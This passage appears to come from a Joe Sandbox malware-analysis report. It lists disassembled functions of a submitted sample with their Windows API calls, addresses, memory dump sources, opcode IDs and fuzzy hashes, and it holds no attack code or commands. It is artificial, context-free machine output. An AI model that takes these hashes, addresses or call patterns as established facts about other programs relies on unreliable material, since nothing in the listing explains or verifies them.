                                                • Instruction Fuzzy Hash: 4F018F73A00208AFDB165FA4ED04B9A7BBDEB48B52F114025F905E2321D770DD009BA0
                                                APIs
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0BE0
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0BED
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0BFA
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0C07
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0C14
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0C21
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 22b75fd5907b3543431833ea0d9c0c54aa732b9bca9397ab2641286e9618ba46
                                                • Instruction ID: a949fa169079081481d096e2e60964eeeb3ae3ab45d86b930fc873343e063447
                                                • Opcode Fuzzy Hash: 22b75fd5907b3543431833ea0d9c0c54aa732b9bca9397ab2641286e9618ba46
                                                • Instruction Fuzzy Hash: 27019071800B669FC735AF66D980816FBF5BE503153168A3ED19252971C7B1A989CE80
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 003D64E7
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 003D64FE
                                                • MessageBeep.USER32(00000000), ref: 003D6516
                                                • KillTimer.USER32(?,0000040A), ref: 003D6532
                                                • EndDialog.USER32(?,00000001), ref: 003D654C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 3cd8c771ad459d68f00ad3d004e03642b74f0df2dfef9adb35bf43386bb7c628
                                                • Instruction ID: 86bab805c4bc75fd5a1992348b6cb8f00cf5171a46dc77fd6d00426289efd435
                                                • Opcode Fuzzy Hash: 3cd8c771ad459d68f00ad3d004e03642b74f0df2dfef9adb35bf43386bb7c628
                                                • Instruction Fuzzy Hash: F901D631900704ABEB215F54FE4FB967779BB10701F00056AB197714E0DBF4AA98CB54
                                                APIs
                                                • _free.LIBCMT ref: 003A264E
                                                  • Part of subcall function 003A2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,003ADB71,00441DC4,00000000,00441DC4,00000000,?,003ADB98,00441DC4,00000007,00441DC4,?,003ADF95,00441DC4), ref: 003A2D6E
                                                  • Part of subcall function 003A2D58: GetLastError.KERNEL32(00441DC4,?,003ADB71,00441DC4,00000000,00441DC4,00000000,?,003ADB98,00441DC4,00000007,00441DC4,?,003ADF95,00441DC4,00441DC4), ref: 003A2D80
                                                • _free.LIBCMT ref: 003A2660
                                                • _free.LIBCMT ref: 003A2673
                                                • _free.LIBCMT ref: 003A2684
                                                • _free.LIBCMT ref: 003A2695
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 608fea7afdcf6dcd531af5ec5f27d84224bb076aa2172f805259202eb4a8a6cc
                                                • Instruction ID: 5355a2d4f2989b765d4c12b0aadd5edc2730ba19c0ea47ab3391eebed3c4ba26
                                                • Opcode Fuzzy Hash: 608fea7afdcf6dcd531af5ec5f27d84224bb076aa2172f805259202eb4a8a6cc
                                                • Instruction Fuzzy Hash: 96F03A788012208FD706BF58BC4184A3B64FB1B751742026BF524AA276C7B00997AF8C
                                                APIs
                                                  • Part of subcall function 003905D2: EnterCriticalSection.KERNEL32(0044170C,?,00000000,?,0037D1DA,00443540,00000001,00000000,?,?,003EEF39,?,?,00000000,00000001,?), ref: 003905DD
                                                  • Part of subcall function 003905D2: LeaveCriticalSection.KERNEL32(0044170C,?,0037D1DA,00443540,00000001,00000000,?,?,003EEF39,?,?,00000000,00000001,?,00000001,00442430), ref: 0039061A
                                                  • Part of subcall function 00390433: __onexit.LIBCMT ref: 00390439
                                                • __Init_thread_footer.LIBCMT ref: 003F6B95
                                                  • Part of subcall function 00390588: EnterCriticalSection.KERNEL32(0044170C,00000000,?,0037D208,00443540,003B27E9,00000001,00000000,?,?,003EEF39,?,?,00000000,00000001,?), ref: 00390592
                                                  • Part of subcall function 00390588: LeaveCriticalSection.KERNEL32(0044170C,?,0037D208,00443540,003B27E9,00000001,00000000,?,?,003EEF39,?,?,00000000,00000001,?,00000001), ref: 003905C5
                                                  • Part of subcall function 003E3EF6: LoadStringW.USER32(00000066,?,00000FFF,0040DCEC), ref: 003E3F3E
                                                  • Part of subcall function 003E3EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 003E3F64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                • String ID: x3D$x3D$x3D
                                                • API String ID: 1072379062-1385361720
                                                • Opcode ID: fc015dccb922bfffa7660a1dbf835f7a26d8a5fca4e564df29986be8efd94a0c
                                                • Instruction ID: 7ca58361cf905b62ba0c13b6ac566eb7bc2ecd074c0400ef678cefb747b356a7
                                                • Opcode Fuzzy Hash: fc015dccb922bfffa7660a1dbf835f7a26d8a5fca4e564df29986be8efd94a0c
                                                • Instruction Fuzzy Hash: 7FC1C135A00109AFDB16DF58C882EBEB7B9FF58300F118069FA55AB291DB74ED44CB90
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0037D203
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: D5D$D5D$D5D
                                                • API String ID: 1385522511-3209547757
                                                • Opcode ID: 538816186b24277a88ddff8387ac69cc37d9ea3d1455bb7c64a319e730cdaa5f
                                                • Instruction ID: 7ab492a5ab88ad6ba979f04251c8cba7a22fe712c822ef3b9710c77e6db85db0
                                                • Opcode Fuzzy Hash: 538816186b24277a88ddff8387ac69cc37d9ea3d1455bb7c64a319e730cdaa5f
                                                • Instruction Fuzzy Hash: A9915875A00206DFCB69CF58C4916AAB7F2FF58710F25816ED849AB340D739EA81CF90
                                                APIs
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003DCAC6
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 003DCB0C
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00442990,01034A78), ref: 003DCB55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem
                                                • String ID: 0
                                                • API String ID: 135850232-4108050209
                                                • Opcode ID: edba7be18510acc29a73005b89f17caa3f654f7f81525cfe9156bfda77743015
                                                • Instruction ID: f4861bff9e0a1756b083f73414bfc34cbab61d7e21d33eb4a81f27fdb03a1786
                                                • Opcode Fuzzy Hash: edba7be18510acc29a73005b89f17caa3f654f7f81525cfe9156bfda77743015
                                                • Instruction Fuzzy Hash: E641C2326253029FDB21DF24E846F6ABBE8AF84324F14561FF9659B391D770E804CB52
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0040DCD0,00000000,?,?,?,?), ref: 00404E09
                                                • GetWindowLongW.USER32 ref: 00404E26
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 3240d1e2f09a8f3e681083a94c12cf05bd9debeb19c23d3a53cb9d5e49d46db5
                                                • Instruction ID: a742ba603595c48503fd874a094ae3c864a2b956d5729c94ff6287c9f58c7c49
                                                • Opcode Fuzzy Hash: 3240d1e2f09a8f3e681083a94c12cf05bd9debeb19c23d3a53cb9d5e49d46db5
                                                • Instruction Fuzzy Hash: 2D317271100205ABDF219E78CC45BEB77A9EF49334F20472AFA79A32D0D778A8519794
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0040489F
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004048B3
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004048D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: ecdb074b914635940b31938e0c3ca07a1e9a156ca442f67f7cf37a96951b5540
                                                • Instruction ID: 67874ed841890cda070966b7637b424e7ae3f42ed11a21c7931e8541a1d9ca69
                                                • Opcode Fuzzy Hash: ecdb074b914635940b31938e0c3ca07a1e9a156ca442f67f7cf37a96951b5540
                                                • Instruction Fuzzy Hash: C121BF37600218AFDF259F90CC42FEB3B69EF88724F104625FE15BB1D0D6B5A8558BA4
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0040419F
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004041AF
                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004041D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: 18b9f6322141dda5118e033ac095d767c983fa708bda814f41cdf29c0f3a02d9
                                                • Instruction ID: ca5a2f996a3fc48b671ce6f521ad77dc7211ec8a8b2149f06c73bd9a6553a8ea
                                                • Opcode Fuzzy Hash: 18b9f6322141dda5118e033ac095d767c983fa708bda814f41cdf29c0f3a02d9
                                                • Instruction Fuzzy Hash: E621C272610218BBEF218F54DC89FBB376EEFD9754F108125FA04AB2D0C6759C9287A4
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00404BAE
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00404BC3
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00404BD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: 041daafabf1589b70f4939415bd85b31b4bc4959b5e15c16a829286c6dffe0a5
                                                • Instruction ID: 45df7bfbc8958ea0b0fb3c585f1ac92de38dbc1095741dab1ec34b700bfaab50
                                                • Opcode Fuzzy Hash: 041daafabf1589b70f4939415bd85b31b4bc4959b5e15c16a829286c6dffe0a5
                                                • Instruction Fuzzy Hash: E411E371240208BEEF215F65CC06FAB7BA8EFC5B14F11452AFA55E61E0D675E8218B28
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00406220
                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0040624D
                                                • DrawMenuBar.USER32(?), ref: 0040625C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$InfoItem$Draw
                                                • String ID: 0
                                                • API String ID: 3227129158-4108050209
                                                • Opcode ID: 3d4b9fb700177bbdd7b1db3fa73980a06934a08a0d653f9b96f7fff63146043c
                                                • Instruction ID: bd595aa3acd9a3f954a4b7f100ec9096e76ed37d7d875cf58ebaaa6a9e6eebfb
                                                • Opcode Fuzzy Hash: 3d4b9fb700177bbdd7b1db3fa73980a06934a08a0d653f9b96f7fff63146043c
                                                • Instruction Fuzzy Hash: AB018031500218EFDF219F61DC44BAB7BB5FF44351F1480AAF84AEA190DB348995EF25
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71c2590894f82a49703453823d09b9a3c0e54cbb6d3a4eace36a270ad4b550f1
                                                • Instruction ID: c24f671721e5012e938a1985eb68bd6c98499e6736c34f89814499c4075cd21c
                                                • Opcode Fuzzy Hash: 71c2590894f82a49703453823d09b9a3c0e54cbb6d3a4eace36a270ad4b550f1
                                                • Instruction Fuzzy Hash: E4C16A76A00206EFCB09CFA4D894BAAB7B5FF48B04F11859AE405AF351D731ED41CB90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                • Instruction ID: 3eeed3476b19ae56acf066f8edcfc5a6b725c1ad91fc306acfe423f18d7570ad
                                                • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                • Instruction Fuzzy Hash: D3A169769007869FDB27CF19C8917AEBBE4EF9B310F19426DE5859B281C3B88D41C750
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00410BD4,?), ref: 003D0E80
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00410BD4,?), ref: 003D0E98
                                                • CLSIDFromProgID.OLE32(?,?,00000000,0040DCE0,000000FF,?,00000000,00000800,00000000,?,00410BD4,?), ref: 003D0EBD
                                                • _memcmp.LIBVCRUNTIME ref: 003D0EDE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                • Opcode ID: 1831ecc356a8ee2f1e8b0fcbfa5903edfcd54ca5505a93c6ee39065717e5caa0
                                                • Instruction ID: fc09d62fda82a23c8d059204dd3035e2db4eb189dc4b4403c4af600ff08a4f4b
                                                • Opcode Fuzzy Hash: 1831ecc356a8ee2f1e8b0fcbfa5903edfcd54ca5505a93c6ee39065717e5caa0
                                                • Instruction Fuzzy Hash: 1A813972A00109EFCB05DFE4C984EEEB7B9FF89715F204559E506AB250DB71AE06CB60
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 003F245A
                                                • WSAGetLastError.WSOCK32 ref: 003F2468
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003F24E7
                                                • WSAGetLastError.WSOCK32 ref: 003F24F1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorLast$socket
                                                • String ID:
                                                • API String ID: 1881357543-0
                                                • Opcode ID: 6df32e4ce799310248f556ff3a3c347e398dbf58c0e7b8454e4b4e7f75724585
                                                • Instruction ID: e11c854c66414ff3ce8a3c886e4bd21fe3931cd6c4e6703ee95724270b8826c2
                                                • Opcode Fuzzy Hash: 6df32e4ce799310248f556ff3a3c347e398dbf58c0e7b8454e4b4e7f75724585
                                                • Instruction Fuzzy Hash: E741D075600200AFE722AF24C896F7A77E5AB04708F54C498FA199F3D2D776ED42CB90
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00406C41
                                                • ScreenToClient.USER32(?,?), ref: 00406C74
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00406CE1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: a337369578c95242dbc2dc53664b9799082b3cd375092de74e83f8b6ce446f3b
                                                • Instruction ID: 154786cc4a0d7b533d2dab87e592d84eacf8de208b11d37605bc521b3b380b3d
                                                • Opcode Fuzzy Hash: a337369578c95242dbc2dc53664b9799082b3cd375092de74e83f8b6ce446f3b
                                                • Instruction Fuzzy Hash: B4515F74A00108AFDF24DF64C9809AE7BB6FF45360F11816AF856AB3A0D774ED91CB94
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003E60DD
                                                • GetLastError.KERNEL32(?,00000000), ref: 003E6103
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003E6128
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003E6154
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: 1bc1ef8b7c4e8ed21f77705721f1ca0caf693207c259dd799f9b573477478895
                                                • Instruction ID: d89a4d81e016af2f960d2c130d451a1a3dd79c0bbe0906295afd0a433e9278d5
                                                • Opcode Fuzzy Hash: 1bc1ef8b7c4e8ed21f77705721f1ca0caf693207c259dd799f9b573477478895
                                                • Instruction Fuzzy Hash: 6B416F39600610DFCB22EF15C555A1EBBE2EF59350B19C088E85AAF362CB34FC01CB91
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 0040204A
                                                  • Part of subcall function 003D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003D42E6
